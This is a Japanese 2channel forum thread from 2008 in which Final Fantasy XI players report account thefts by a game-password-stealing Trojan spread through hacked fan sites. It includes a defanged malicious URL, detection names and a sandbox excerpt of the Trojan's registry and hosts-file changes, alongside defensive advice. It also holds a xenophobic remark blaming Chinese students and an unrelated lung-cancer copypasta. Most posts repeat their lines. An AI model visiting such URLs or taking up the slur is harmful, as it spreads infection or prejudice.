能動的にUPDATEすることができなくて最新かはわからなかったですが
特に問題ないようなので許可することにします。
ありがとうございます。
すいません。
アカマイとか聞いたことなくて;
とりあえずPOLのバージョン確認しましたがVer.1.18.10eでした。
能動的にUPDATEすることができなくて最新かはわからなかったですが
特に問題ないようなので許可することにします。
731 :既にその名前は使われています:2008/08/12(火) 00:30:19 ID:wSMfEd0b
フレがハックされてGMコールしたらpolのGMコールでのログイン制限のかけ方教わって凍結した。
でも、あれの本人からの依頼確認の要件って、なんか悪用され易そうでこわい。
下手すると、嫌いなやつとかに嫌がらせするやつが出てくるかもしれん。
でも、あれの本人からの依頼確認の要件って、なんか悪用され易そうでこわい。
下手すると、嫌いなやつとかに嫌がらせするやつが出てくるかもしれん。
732 :既にその名前は使われています:2008/08/12(火) 00:30:47 ID:rXX76NIq
業者もむかつくがRMでギル買ってる奴にも殺意覚えるわ
買う奴がいるから業者がいるわけだしな。
買う奴がいるから業者がいるわけだしな。
733 :既にその名前は使われています:2008/08/12(火) 00:34:58 ID:NGS22e+2
アメ公がいっぱい買ってるんだよな
734 :既にその名前は使われています:2008/08/12(火) 00:35:56 ID:NtzPsE/N
俺も今日垢ハックされた身
リアフレの情報によると今もとあるところで活動中とのこと
まあこれを機にやめる踏ん切りがついたわけだけどやめる前にこれだけはやっておけ!ってことありますか?
リアフレの情報によると今もとあるところで活動中とのこと
まあこれを機にやめる踏ん切りがついたわけだけどやめる前にこれだけはやっておけ!ってことありますか?
735 :既にその名前は使われています:2008/08/12(火) 00:37:01 ID:tWqawtp5
736 :既にその名前は使われています:2008/08/12(火) 00:38:06 ID:moOWPCGr
マップサイトで食らって俺もやられたよん。
さっさと解約させて欲しいが、GMの対応おせー。
俺のキャラもヴァナで活動中らしい、印章でも使ってるのかなw
さっさと解約させて欲しいが、GMの対応おせー。
俺のキャラもヴァナで活動中らしい、印章でも使ってるのかなw
737 :既にその名前は使われています:2008/08/12(火) 00:40:22 ID:ldcnPzIu
カードはまずはスクエニに話しつけたほうがいいぞ。
申告しない限り垢ハックとは分からないからスクエニとしては正規の請求として上げるはずです。
となるとカード止めても有効な請求と見なされて請求が来ちゃう場合もあるので。
申告しない限り垢ハックとは分からないからスクエニとしては正規の請求として上げるはずです。
となるとカード止めても有効な請求と見なされて請求が来ちゃう場合もあるので。
738 :既にその名前は使われています:2008/08/12(火) 00:42:24 ID:NtzPsE/N
>>735
ウェブマネーなのでその辺は大丈夫だと思います。
>>736
自分のキャラはなんかダンジョンでPT組んでましたよw
サーチしただけじゃ分からなかったけどPT全員垢ハックされたキャラなのかな〜
ウェブマネーなのでその辺は大丈夫だと思います。
>>736
自分のキャラはなんかダンジョンでPT組んでましたよw
サーチしただけじゃ分からなかったけどPT全員垢ハックされたキャラなのかな〜
739 :既にその名前は使われています:2008/08/12(火) 00:45:12 ID:2blWucZx
やっぱネトゲでクレカ使うもんじゃないな
つーか垢盗まれるとクレカまで勝手に使われるってスクエニぐらいじゃね?
普通はクレカ登録しててもアイテム買う度にクレカ番号は入力させられるよな
つーか垢盗まれるとクレカまで勝手に使われるってスクエニぐらいじゃね?
普通はクレカ登録しててもアイテム買う度にクレカ番号は入力させられるよな
740 :既にその名前は使われています:2008/08/12(火) 00:46:52 ID:4/4CIjDx
RMTは規約違反ではあっても違法ではないからなぁ
そもそも業者自体が野放し同然で、RMT利用者への罰も見て取れない時期が
長すぎた、特にNA入ってきてから客が増え、FF11ギルのRMT市場が完全に
出来上がった、この時点でSTTだの月次発表だの、後から手を打っても焼け石に水
そもそも業者自体が野放し同然で、RMT利用者への罰も見て取れない時期が
長すぎた、特にNA入ってきてから客が増え、FF11ギルのRMT市場が完全に
出来上がった、この時点でSTTだの月次発表だの、後から手を打っても焼け石に水
741 :既にその名前は使われています:2008/08/12(火) 00:47:47 ID:qjegPAtA
この際クレカ番号もパスワードと一緒で「保存する/しないで毎回入力」の選択制にすればいい
742 :既にその名前は使われています:2008/08/12(火) 00:51:22 ID:cPfiN4NV
>>734
きっちり退会手続き、復帰する気が無いならこれ大事
きっちり退会手続き、復帰する気が無いならこれ大事
743 :既にその名前は使われています:2008/08/12(火) 00:53:08 ID:qJLmg1q0
>731
少し前まではそういう悪用を恐れて「本人以外からの凍結依頼は×」だったのを
あまりにハック被害がひどいから、本人から依頼された他人でもOKにしたんだよね
凍結する前に、一応tellで問いかけとかしてると思いたいけど
少し前まではそういう悪用を恐れて「本人以外からの凍結依頼は×」だったのを
あまりにハック被害がひどいから、本人から依頼された他人でもOKにしたんだよね
凍結する前に、一応tellで問いかけとかしてると思いたいけど
744 :既にその名前は使われています:2008/08/12(火) 01:03:35 ID:joGWKnEH
TVで面白がってRMT市場1500億とか言ってるけど
この大半は垢ハックで稼いだ金なんだよな。
人から盗んだアイテム売り飛ばして市場も糞もねーよな
この大半は垢ハックで稼いだ金なんだよな。
人から盗んだアイテム売り飛ばして市場も糞もねーよな
745 :既にその名前は使われています:2008/08/12(火) 01:09:20 ID:QsU99vbQ
しかしキャラ取られたやつはしっかり取り返せよ。
被害者であると同時に加害者なんだからな。
被害者であると同時に加害者なんだからな。
746 :既にその名前は使われています:2008/08/12(火) 01:18:26 ID:moOWPCGr
もう退会するからキャラとかどうでもいいわ。
しったこっちゃねーよw
しったこっちゃねーよw
747 :既にその名前は使われています:2008/08/12(火) 01:18:27 ID:ldcnPzIu
748 :既にその名前は使われています:2008/08/12(火) 01:32:43 ID:5bedcXmV
毎日カスペルスキャンしないと不安で寝れないカラダになった
749 :既にその名前は使われています:2008/08/12(火) 01:35:34 ID:kksDtLGT
垢ファックされた装備とりもどすのにRMTした俺がポップwwwwww
750 :既にその名前は使われています:2008/08/12(火) 01:36:31 ID:qjegPAtA
>>749
洗面所に行って鏡に向かって「RMTer市ね」って言って来て
洗面所に行って鏡に向かって「RMTer市ね」って言って来て
751 :既にその名前は使われています:2008/08/12(火) 01:47:10 ID:WYdJW93x
ジラードからコイツでやってきただけに、愛着あるから、せつねぇ(´Д⊂
自分が悪いのカモだけど、なんでこんなことすんだーバカヤロー(ノ ゜Д゜)ノ == ┻━┻
自分が悪いのカモだけど、なんでこんなことすんだーバカヤロー(ノ ゜Д゜)ノ == ┻━┻
752 :既にその名前は使われています:2008/08/12(火) 01:59:03 ID:kYz4Nzr2
いつのまにか専門的な知識必要になってるし、今回のは仕方ない。
自分も防ぐ自信ないしPC版だったら今頃感染してぬかれてる。
愛着あるキャラがBOTになってたとかショックだろうし。
自分も防ぐ自信ないしPC版だったら今頃感染してぬかれてる。
愛着あるキャラがBOTになってたとかショックだろうし。
753 :既にその名前は使われています:2008/08/12(火) 02:05:47 ID:NGS22e+2
>>751
ジラー「ト」なんだぜ
ジラー「ト」なんだぜ
754 :既にその名前は使われています:2008/08/12(火) 02:14:35 ID:1uo1rqJ+
日本へ奨学金でプログラムを学びに来た中華がハックしまくってるからな
日本で学んだ技術を本国へ戻って犯罪に使う。日本政府の思惑通りじゃないですか
日本で学んだ技術を本国へ戻って犯罪に使う。日本政府の思惑通りじゃないですか
755 :既にその名前は使われています:2008/08/12(火) 02:15:09 ID:cRdaKwxO
つか今月になってやられたやられた言ってるやつって
テンプレの対策はしてたの?
テンプレの対策はしてたの?
756 :既にその名前は使われています:2008/08/12(火) 02:28:13 ID:Na4GuiVw
>>755
してない人いっぱいいると思う
ネ実のこの板に居たってこのスレ見てない人多そうだし
バスター系ソフト入れてれば大丈夫だと思ってる人いっぱいだね
FFAHとかマップサイトとか、URLをナマのままペタペタ張ってるスレ多い
してない人いっぱいいると思う
ネ実のこの板に居たってこのスレ見てない人多そうだし
バスター系ソフト入れてれば大丈夫だと思ってる人いっぱいだね
FFAHとかマップサイトとか、URLをナマのままペタペタ張ってるスレ多い
757 :既にその名前は使われています:2008/08/12(火) 02:33:55 ID:hYYxI/cZ
マップサイトも危ないのか
あんな画像を表示させるだけのサイトも危険なの?
あんな画像を表示させるだけのサイトも危険なの?
758 :既にその名前は使われています:2008/08/12(火) 02:35:38 ID:cRdaKwxO
だよなぁ、2回目やられたって人聞かないから
対策してれば乗り越えられたってことだろうしなぁ
対策してれば乗り越えられたってことだろうしなぁ
759 :既にその名前は使われています:2008/08/12(火) 02:36:42 ID:3CRl2nX4
カスペルスキーオンラインスキャンしたら、Eドライブに14個も感染見つかってワロタ
どうなってんだ
どうなってんだ
760 :既にその名前は使われています:2008/08/12(火) 02:42:18 ID:qTHUdIIO
カスペにしてからFFしてるとフリーズすることが増えた
761 :既にその名前は使われています:2008/08/12(火) 03:25:25 ID:Su7jRKR1
>>757
穴があってアクセス数や知名度多い所を狙ってくるから内容関係無い。
穴があってアクセス数や知名度多い所を狙ってくるから内容関係無い。
762 :既にその名前は使われています:2008/08/12(火) 03:30:13 ID:4/4CIjDx
そもそもマップサイトが画像を表示させるだけと認識してる時点で・・・
そのjpeg開くリンクはhtmlにあるんじゃないかと小一時間t(ry
そのjpeg開くリンクはhtmlにあるんじゃないかと小一時間t(ry
763 :既にその名前は使われています:2008/08/12(火) 03:31:37 ID:hYYxI/cZ
htmlなら埋め込まれる危険性があるのかな?
もっとphpとか凝ったことしてることろが危ないのかと思ってた
もっとphpとか凝ったことしてることろが危ないのかと思ってた
764 :既にその名前は使われています:2008/08/12(火) 03:38:05 ID:bM7SypqP
>>759
結構誤反応でひっかかってるだけってのも多いぞ
結構誤反応でひっかかってるだけってのも多いぞ
765 :既にその名前は使われています:2008/08/12(火) 04:24:49 ID:Na4GuiVw
766 :既にその名前は使われています:2008/08/12(火) 08:12:09 ID:bWEoMwJo
肺ガンの苦しみって知らないの?
あれは見ている方もつらいもんだよ。
とにかく息が出来なくて苦しいんだよ。精一杯はぁはぁやってるけど
肺が酸素をあまり吸収してくれないから24時間ずっと息が苦しい。
溺れてるかのように空気を求めてのたうちまわる。
単純に痛いのなら痛み止めで楽になる。他の苦痛も麻酔や麻薬の
ようなもので苦痛を取り除くことは出来る。でも息が苦しいのは
どうしようもない。酸素を肺に送り込んでもその肺の機能が低下
している以上苦しいのは解消しない。症状が悪化するに従って
ひどくなる。まるでベッドで長期間溺れているようだ。
痛みはごまかせるけど、末期の肺癌は、肺が酸素を取り込まなくなってるから。
呼吸出来なくなる→ちょっと呼吸できる→呼吸出来なくなる→以下、死ぬまで繰り返し
拷問で殺される以外で、最も苦しい死に方。
あれは見ている方もつらいもんだよ。
とにかく息が出来なくて苦しいんだよ。精一杯はぁはぁやってるけど
肺が酸素をあまり吸収してくれないから24時間ずっと息が苦しい。
溺れてるかのように空気を求めてのたうちまわる。
単純に痛いのなら痛み止めで楽になる。他の苦痛も麻酔や麻薬の
ようなもので苦痛を取り除くことは出来る。でも息が苦しいのは
どうしようもない。酸素を肺に送り込んでもその肺の機能が低下
している以上苦しいのは解消しない。症状が悪化するに従って
ひどくなる。まるでベッドで長期間溺れているようだ。
痛みはごまかせるけど、末期の肺癌は、肺が酸素を取り込まなくなってるから。
呼吸出来なくなる→ちょっと呼吸できる→呼吸出来なくなる→以下、死ぬまで繰り返し
拷問で殺される以外で、最も苦しい死に方。
767 :既にその名前は使われています:2008/08/12(火) 08:47:45 ID:ekoaK+sE
保守
Flashplayer Ver9.0.124.0にしよう!
Realplayer 使わないなら削除しよう!
WindowsUpdate 常に最新にしよう!
パスワード は保存しない!
Flashplayer Ver9.0.124.0にしよう!
Realplayer 使わないなら削除しよう!
WindowsUpdate 常に最新にしよう!
パスワード は保存しない!
768 :既にその名前は使われています:2008/08/12(火) 09:30:51 ID:R/BMTcnj
769 :既にその名前は使われています:2008/08/12(火) 10:22:20 ID:IR1yNkJm
Trojan-GameThief.Win32.OnLineGames.biuv"
これって何?w
これって何?w
770 :既にその名前は使われています:2008/08/12(火) 10:27:59 ID:SWCeQ/U/
>>769
名前見たとおりだと思うが...
名前見たとおりだと思うが...
771 :既にその名前は使われています:2008/08/12(火) 10:28:28 ID:xK4vrGyy
>>769
今回のxreaサーバ事件で感染するやつらしい
http://www.virustotal.com/analisis/8e2651443274b5a034e5d6c69e8fefd9
出典:
http://pc11.2ch.net/test/read.cgi/sec/1216217642/156
今回のxreaサーバ事件で感染するやつらしい
http://www.virustotal.com/analisis/8e2651443274b5a034e5d6c69e8fefd9
出典:
http://pc11.2ch.net/test/read.cgi/sec/1216217642/156
772 :既にその名前は使われています:2008/08/12(火) 10:37:16 ID:IR1yNkJm
やっぱりそうかー
プレイオンラインに入れないですw
パスワードが違うそうでw
どこで拾ったんだろうw
取り合えず相談してみるー
ありがと〜
プレイオンラインに入れないですw
パスワードが違うそうでw
どこで拾ったんだろうw
取り合えず相談してみるー
ありがと〜
773 :既にその名前は使われています:2008/08/12(火) 10:48:11 ID:0yYcUu2r
XREAはどのサーバでもphpはインストールされてて
最古の鯖でもphp4.4以降だったはず。
register_globalsの設定は4.2以降はデフォルトがoffのはずなのに
offに設定しろって言われるってことは XREA側でonに直してるってことなのかな。
オートインストールできるxoopsが最新バージョンじゃないことだし
とりあえず XREA使ってる人はphpinfo確認したほうがよさそう。
んで ちょろっと忍さんのテンプレサイトのソースをみてたんだけど
FAQページの一番下 文字色白で見えなくしてるところに
コメントアウトして出会い系のリンクしこまれてるのと
ファミ通への抗議署名サイトの飛び先が改変されてる
アカハクとは関係ないし
改ざんされたのか クライアントでそうしてるかは不明だけどね。
最古の鯖でもphp4.4以降だったはず。
register_globalsの設定は4.2以降はデフォルトがoffのはずなのに
offに設定しろって言われるってことは XREA側でonに直してるってことなのかな。
オートインストールできるxoopsが最新バージョンじゃないことだし
とりあえず XREA使ってる人はphpinfo確認したほうがよさそう。
んで ちょろっと忍さんのテンプレサイトのソースをみてたんだけど
FAQページの一番下 文字色白で見えなくしてるところに
コメントアウトして出会い系のリンクしこまれてるのと
ファミ通への抗議署名サイトの飛び先が改変されてる
アカハクとは関係ないし
改ざんされたのか クライアントでそうしてるかは不明だけどね。
774 :既にその名前は使われています:2008/08/12(火) 10:53:10 ID:uJ/qW/xt
>>772
どの程度の対策してたか参考までに教えてくれまいか?
どの程度の対策してたか参考までに教えてくれまいか?
775 :既にその名前は使われています:2008/08/12(火) 10:54:01 ID:xl+dHBlQ
マップガイドしょっちゅう見てたから俺もやべー!!
パスワード変更するだけじゃダメですか・・・?
パスワード変更するだけじゃダメですか・・・?
776 :既にその名前は使われています:2008/08/12(火) 11:01:31 ID:IR1yNkJm
>>774
PCの設定は全然知らなくて、今回のことで
無料のウィルススキャンをしてみたらひっかかったんです
一応そのまま削除できたので削除しました。
スキャンした場所はニフティでw
パスワード変更もしていないし、いつも自動ログインしてましたw
あんまり詳しくなくてごめんねー
これじゃあ自業自得だとおもうw
PCの設定は全然知らなくて、今回のことで
無料のウィルススキャンをしてみたらひっかかったんです
一応そのまま削除できたので削除しました。
スキャンした場所はニフティでw
パスワード変更もしていないし、いつも自動ログインしてましたw
あんまり詳しくなくてごめんねー
これじゃあ自業自得だとおもうw
777 :既にその名前は使われています:2008/08/12(火) 11:02:34 ID:xl+dHBlQ
>>701
ヨハネスブルグのガイドライン改変かこれww
ヨハネスブルグのガイドライン改変かこれww
778 :既にその名前は使われています:2008/08/12(火) 11:08:26 ID:gM70EMnp
>>775
不安を感じるならハードディスクフォーマットして一からクリーンインストールだ
不安を感じるならハードディスクフォーマットして一からクリーンインストールだ
779 :既にその名前は使われています:2008/08/12(火) 11:12:24 ID:uJ/qW/xt
780 :既にその名前は使われています:2008/08/12(火) 11:13:44 ID:xl+dHBlQ
781 :既にその名前は使われています:2008/08/12(火) 11:15:56 ID:gM70EMnp
バックアップがめんどくさいなら
とりあえず新しいPC買ってくるって手もあるぜ
とりあえず新しいPC買ってくるって手もあるぜ
782 :既にその名前は使われています:2008/08/12(火) 11:20:57 ID:8mwMTfBK
外付けHDD2台買って、データはその1台に保存し、週1くらいでさらにもう1台のほうと同期。
いまUSBの奴とか容量大きくてすごく安い。
システムドライブはクリーンインストール後をディスクイメージで保存しといてたまにリストア&VUかなあ
いまUSBの奴とか容量大きくてすごく安い。
システムドライブはクリーンインストール後をディスクイメージで保存しといてたまにリストア&VUかなあ
783 :既にその名前は使われています:2008/08/12(火) 11:25:56 ID:xl+dHBlQ
スクエニには気楽にゲームできる環境作りをがんばってもらいたいわ
でも自衛もできないやつはネットすんな!って言われちゃいそうだなw
実際被害にあって泣き寝入りというか、そのまま辞めちゃうプレイヤーだっているだろうし
スクエニも本気で対策に乗り出してほしい もうしてるんだろうか
でも自衛もできないやつはネットすんな!って言われちゃいそうだなw
実際被害にあって泣き寝入りというか、そのまま辞めちゃうプレイヤーだっているだろうし
スクエニも本気で対策に乗り出してほしい もうしてるんだろうか
784 :既にその名前は使われています:2008/08/12(火) 11:38:43 ID:rWfCQiFQ
クリーンインスコなんて面倒なのは最初だけだ。
2度目からは痛くなくなるぞ。
3度目以降はヤる毎にエクスタシーを感じるようになる。
さあやれ。いますぐやれ。
2度目からは痛くなくなるぞ。
3度目以降はヤる毎にエクスタシーを感じるようになる。
さあやれ。いますぐやれ。
785 :652:2008/08/12(火) 11:44:52 ID:yMj7L165
不正チャットでパス変更してもらってから、ドキドキしてログインしたけど被害は喰らって
ませんでした。ログアウトした場所も変わってなかったです。どうやら新しいパス変更を間違えて
登録した模様です。アドバイスくれた方々ありがとうございました。
ませんでした。ログアウトした場所も変わってなかったです。どうやら新しいパス変更を間違えて
登録した模様です。アドバイスくれた方々ありがとうございました。
786 :既にその名前は使われています:2008/08/12(火) 11:45:11 ID:PnBHOhdn
787 :既にその名前は使われています:2008/08/12(火) 11:54:26 ID:MqAOymsX
ちょっと質問ですがハック食らった人でパス手動入力の人もいる?
788 :既にその名前は使われています:2008/08/12(火) 11:59:49 ID:Ja4I/lsn
789 :既にその名前は使われています:2008/08/12(火) 12:04:42 ID:cPfiN4NV
スクエニがいくら環境を作ろうがエンドユーザーのプレイヤーが何もしてなきゃ意味ないわな
それぐらいFFやってる奴の危機意識が低いって事だ
それぐらいFFやってる奴の危機意識が低いって事だ
790 :既にその名前は使われています:2008/08/12(火) 12:07:30 ID:qd131Z+Z
オレも今回アカハックされて危機意識に目覚めたと同時にゲーム熱が醒めた
いいゲームが見つかるまで、もうやらんw
いいゲームが見つかるまで、もうやらんw
791 :既にその名前は使われています:2008/08/12(火) 12:13:19 ID:gM70EMnp
>>787
沢山いる
今やられてるやつは
キー入力を監視したりローカルに保存されてるデータを読んだりするのではなく
POLビューアの通信そのものを横取りしてるので
入力方法やパス保存の有無に関わらず抜かれるぽ
沢山いる
今やられてるやつは
キー入力を監視したりローカルに保存されてるデータを読んだりするのではなく
POLビューアの通信そのものを横取りしてるので
入力方法やパス保存の有無に関わらず抜かれるぽ
792 :既にその名前は使われています:2008/08/12(火) 12:16:27 ID:/3ujoU1G
不正チャット、混雑中で利用できませんって出てくるんだけど、
この時間はいつもこんなもん?
この時間はいつもこんなもん?
793 :既にその名前は使われています:2008/08/12(火) 12:18:11 ID:cPfiN4NV
しかも今被害にあってる奴は被害よりもかなり前に感染してるはずだからな
潜在的ハック被害者はもっと多いんだと思う、言わば中華のレジに順番待ちしてる状態
PCの異常に気がついて検索なりすればここに流れてくることもあるだろうが
潜在的ハック被害者はもっと多いんだと思う、言わば中華のレジに順番待ちしてる状態
PCの異常に気がついて検索なりすればここに流れてくることもあるだろうが
794 :既にその名前は使われています:2008/08/12(火) 12:21:29 ID:MqAOymsX
795 :既にその名前は使われています:2008/08/12(火) 12:28:46 ID:DOg2tyOI
>>793
多分そうだろうね。
一人のアカウントから全財産を剥ぎ取るのに、1時間はかかるだろうし、
それ考えると、一人の担当業者wが処理できるのは一日に十件くらいか?
順番待ちの潜在的な被害者は、まだまだ居るんだろうな。
多分そうだろうね。
一人のアカウントから全財産を剥ぎ取るのに、1時間はかかるだろうし、
それ考えると、一人の担当業者wが処理できるのは一日に十件くらいか?
順番待ちの潜在的な被害者は、まだまだ居るんだろうな。
796 :既にその名前は使われています:2008/08/12(火) 12:32:05 ID:3UdKgtYP
FFに関して言うなら>>783のいうところの「気楽にゲームできる環境作り」ってコンシューマ機でやって
ID・パスを一切入力をしないで実現できるじゃんw
ID・パスを一切入力をしないで実現できるじゃんw
797 :既にその名前は使われています:2008/08/12(火) 12:47:47 ID:NGS22e+2
先週XREAに仕掛けられたトロイが更新。
ttp://www.virustotal.com/analisis/ccc234390e5b7a6c342d589bf2a33038
× Norton McAfee バスター AntiVir avast AVG BitDefender ソースネクスト(笑) 他多数
これはひどい…。各社に提出済み。
ttp://www.virustotal.com/analisis/ccc234390e5b7a6c342d589bf2a33038
× Norton McAfee バスター AntiVir avast AVG BitDefender ソースネクスト(笑) 他多数
これはひどい…。各社に提出済み。
798 :既にその名前は使われています:2008/08/12(火) 12:50:49 ID:R3cEuHAo
799 :既にその名前は使われています:2008/08/12(火) 12:56:17 ID:FT168A6p
問題のウイルス置き場IPとその周辺IPをルーターでブロックするようにしたけど・・・
短期間で変更されたり増やされたらもうお手上げだ
アンチソフトメーカーも対応が追いついていないし
HTMLの直接改ざんに及んでいるからクライアント側は対応がかなり厳しいよ
短期間で変更されたり増やされたらもうお手上げだ
アンチソフトメーカーも対応が追いついていないし
HTMLの直接改ざんに及んでいるからクライアント側は対応がかなり厳しいよ
800 :既にその名前は使われています:2008/08/12(火) 13:00:14 ID:RtRMH9Nl
>>797
カスペルスキー強いな、製品版そろそろ買うか。ッて言うかトロイが更新、ッて凄く嫌だなw
カスペルスキー強いな、製品版そろそろ買うか。ッて言うかトロイが更新、ッて凄く嫌だなw
801 :既にその名前は使われています:2008/08/12(火) 13:03:14 ID:FT168A6p
802 :既にその名前は使われています:2008/08/12(火) 13:21:15 ID:wRXfyxuJ
>>784
ほんとその通り。
1度目はなんでこんな・・;;って辛いけど
2度目はカンタ〜〜ンw
なぜかドライブのクリーン時間も短くなる。
(パーティション領域変えてないの不思議)
まだエクスタシーを感じないけど、
さあやれ。いますぐやれ。だよwww
多少D領域作っておくとバックアップも楽だよ。
時間かかるから、部屋の掃除とか兼ねるといいよw
DVD用意しとくのもお勧めw
ほんとその通り。
1度目はなんでこんな・・;;って辛いけど
2度目はカンタ〜〜ンw
なぜかドライブのクリーン時間も短くなる。
(パーティション領域変えてないの不思議)
まだエクスタシーを感じないけど、
さあやれ。いますぐやれ。だよwww
多少D領域作っておくとバックアップも楽だよ。
時間かかるから、部屋の掃除とか兼ねるといいよw
DVD用意しとくのもお勧めw
803 :既にその名前は使われています:2008/08/12(火) 13:30:18 ID:17CWOzyq
■eの不正アクセス専用チャットに入ろうとすると
「現在、混雑のためチャットサポートはご利用いただけません。
お時間をおいて再度お試しくださいますよう、お願い申し上げます。」
と出る。平日の昼間だけしか対応してくれない上にこの状態。
退会するだけのためにこれだけ労力を払っているのが
アホらしくなってきた
「現在、混雑のためチャットサポートはご利用いただけません。
お時間をおいて再度お試しくださいますよう、お願い申し上げます。」
と出る。平日の昼間だけしか対応してくれない上にこの状態。
退会するだけのためにこれだけ労力を払っているのが
アホらしくなってきた
804 :既にその名前は使われています:2008/08/12(火) 13:31:40 ID:dU77gLFf
クレカなら知らないけどウェブマネーなら課金せずに放っておけば良いんじゃない?
805 :既にその名前は使われています:2008/08/12(火) 13:32:25 ID:NGS22e+2
あとこのトロイ、シェル拡張として動作し、
hostsに危険サイトを片っ端から突っ込んでる人を乙らせるために
hostsを削除する模様。
Norman砂箱より。
[ Changes to registry ]
* Accesses Registry key "HKLM\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\ShellExecuteHooks".
[ Changes to filesystem ]
* Deletes file C:\WINDOWS\SYSTEM32\drivers\etc\Hosts.
hostsに危険サイトを片っ端から突っ込んでる人を乙らせるために
hostsを削除する模様。
Norman砂箱より。
[ Changes to registry ]
* Accesses Registry key "HKLM\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\ShellExecuteHooks".
[ Changes to filesystem ]
* Deletes file C:\WINDOWS\SYSTEM32\drivers\etc\Hosts.
806 :既にその名前は使われています:2008/08/12(火) 13:35:04 ID:8EW1feBj
RMTでギル買ったやつハックすりゃいいのにな。
周りに迷惑かけんなよほんとに。
周りに迷惑かけんなよほんとに。
807 :既にその名前は使われています:2008/08/12(火) 13:35:14 ID:17CWOzyq
808 :既にその名前は使われています:2008/08/12(火) 13:39:30 ID:GEprlb2+
OneCareはどうなの?使ってるけどあんまり聞かないからちょっと怖いなー
809 :既にその名前は使われています:2008/08/12(火) 13:44:42 ID:QXts6zsB
>>803
正式に退会しないで課金だけ止めてるだけだと、知らない間にハック受けて
業者に自分のキャラ使われることもあるかも
もちろん課金は盗んだクレカで
もうやる気無いんだったらキャラ削除して、退会手続きして、PCからPOL以下全部アンインストール推奨
正式に退会しないで課金だけ止めてるだけだと、知らない間にハック受けて
業者に自分のキャラ使われることもあるかも
もちろん課金は盗んだクレカで
もうやる気無いんだったらキャラ削除して、退会手続きして、PCからPOL以下全部アンインストール推奨
810 :既にその名前は使われています:2008/08/12(火) 13:48:35 ID:QXts6zsB
811 :既にその名前は使われています:2008/08/12(火) 13:50:41 ID:OeSg/N81
一回ハック受けると、ウィルスチェックしても危ないですか?
812 :既にその名前は使われています:2008/08/12(火) 13:53:16 ID:QXts6zsB
どういう意味で言ってるのかイマイチ分からんけど
安全で無いことは確かです
安全で無いことは確かです
813 :既にその名前は使われています:2008/08/12(火) 13:53:39 ID:TWCBrm5G
814 :既にその名前は使われています:2008/08/12(火) 14:12:41 ID:Kn/MThG4
>>811
戸締り悪くて泥棒に入られた家なのですが、また泥棒は入りますか?
戸締り悪くて泥棒に入られた家なのですが、また泥棒は入りますか?
815 :既にその名前は使われています:2008/08/12(火) 14:17:08 ID:n014sXOV
1039045744のjsのやつもフラッシュプレイヤーのときみたいに
結構被害でるんじゃないかこれ
結構被害でるんじゃないかこれ
816 :既にその名前は使われています:2008/08/12(火) 14:26:48 ID:xK4vrGyy
1039045744もFlash Playerの脆弱性を突いて感染させる
817 :既にその名前は使われています:2008/08/12(火) 15:01:39 ID:IR1yNkJm
818 :既にその名前は使われています:2008/08/12(火) 15:04:49 ID:RtRMH9Nl
>>808
怖いって言うか地雷とか不発弾の類。
怖いって言うか地雷とか不発弾の類。
819 :既にその名前は使われています:2008/08/12(火) 15:12:23 ID:MxQbHCid
アカハック被害にあいました。5年も愛着あったキャラだったのに・・・
別アカで入ってみたら見事に自分のキャラがサーチでひっかかった。
スンゲーショックです。。。みんなも気をつけてくでー
昨日入った怪しいサイトあるんだがURLとかは張ったらまずい?
別アカで入ってみたら見事に自分のキャラがサーチでひっかかった。
スンゲーショックです。。。みんなも気をつけてくでー
昨日入った怪しいサイトあるんだがURLとかは張ったらまずい?
820 :既にその名前は使われています:2008/08/12(火) 15:13:11 ID:qnU74Hfv
>>819
注意書きして貼ればOK
注意書きして貼ればOK
821 :既にその名前は使われています:2008/08/12(火) 15:13:58 ID:6IQ3Sixp
.を■に変えたりすればいいんでないかい
822 :既にその名前は使われています:2008/08/12(火) 15:14:20 ID:Scyc/l7c
>>819
ドットを■にするなりして直リンにしなければおk
ドットを■にするなりして直リンにしなければおk
823 :既にその名前は使われています:2008/08/12(火) 15:14:20 ID:Zh7f1fZT
>>819
.を■に変えて報告頼む。どういう経由でそんなサイトに入ったの?
.を■に変えて報告頼む。どういう経由でそんなサイトに入ったの?
824 :既にその名前は使われています:2008/08/12(火) 15:19:38 ID:MxQbHCid
www■geocities■jp/ff11info110
Yahooでff11でボーっと検索していろいろ見てたら踏んじゃった。ジオシティー
だから関係ないのかな?もし関係なかったらすんません。
救済用チャットつながらない〜
Yahooでff11でボーっと検索していろいろ見てたら踏んじゃった。ジオシティー
だから関係ないのかな?もし関係なかったらすんません。
救済用チャットつながらない〜
825 :既にその名前は使われています:2008/08/12(火) 15:21:34 ID:5fYZXP6e
まじか・・・・これじゃネットみれんな
826 :既にその名前は使われています:2008/08/12(火) 15:24:06 ID:wqkDLlV8
新種でたから信用できるサイトでも不要意に踏まないほうがいいよ
827 :既にその名前は使われています:2008/08/12(火) 15:29:22 ID:NGS22e+2
828 :既にその名前は使われています:2008/08/12(火) 15:30:56 ID:0y8Yw/BW
WEB閲覧用にコンシューマ機でも買おうかと思ったけど、
むしろそっちでFFしたほうがいいかw
むしろそっちでFFしたほうがいいかw
829 :既にその名前は使われています:2008/08/12(火) 15:32:01 ID:gM70EMnp
便利ガイドもジオシティーだったな。
830 :既にその名前は使われています:2008/08/12(火) 15:36:45 ID:MxQbHCid
関係なかったか〜、athletaさんすんません。ちなみに不正アクセスチャット
つながりました。現在45人待ち。多すぎ。
つながりました。現在45人待ち。多すぎ。
831 :既にその名前は使われています:2008/08/12(火) 15:39:59 ID:3Sv+etv8
45人・・・
832 :既にその名前は使われています:2008/08/12(火) 15:49:33 ID:NGS22e+2
>>829
netbenriはXREAだったよ。今回やられて(?)sakuraに移転したけど。
netbenriはXREAだったよ。今回やられて(?)sakuraに移転したけど。
833 :既にその名前は使われています:2008/08/12(火) 16:06:22 ID:8jOBXpXl
834 :既にその名前は使われています:2008/08/12(火) 16:07:52 ID:kYz4Nzr2
XREA以外のレンタルサーバにハックかけられる可能性だって
捨てきれないんだよな。・゚・(ノД`)・゚・。
大手プロバイダ、ポータルサイト系の狙われたらどうしよう;
捨てきれないんだよな。・゚・(ノД`)・゚・。
大手プロバイダ、ポータルサイト系の狙われたらどうしよう;
835 :既にその名前は使われています:2008/08/12(火) 16:08:38 ID:jfUGeK5Z
>>791
>沢山いる
沢山いるか?報告みてもほぼパス保存しか見当たらないわけだが
手打ちって言っても昔からではなく最近の被害でてから手打ちにしてたりが多いみたいだし
当然パス抜かれた後にWindowsUpdateとかしてもあれなわけで
>沢山いる
沢山いるか?報告みてもほぼパス保存しか見当たらないわけだが
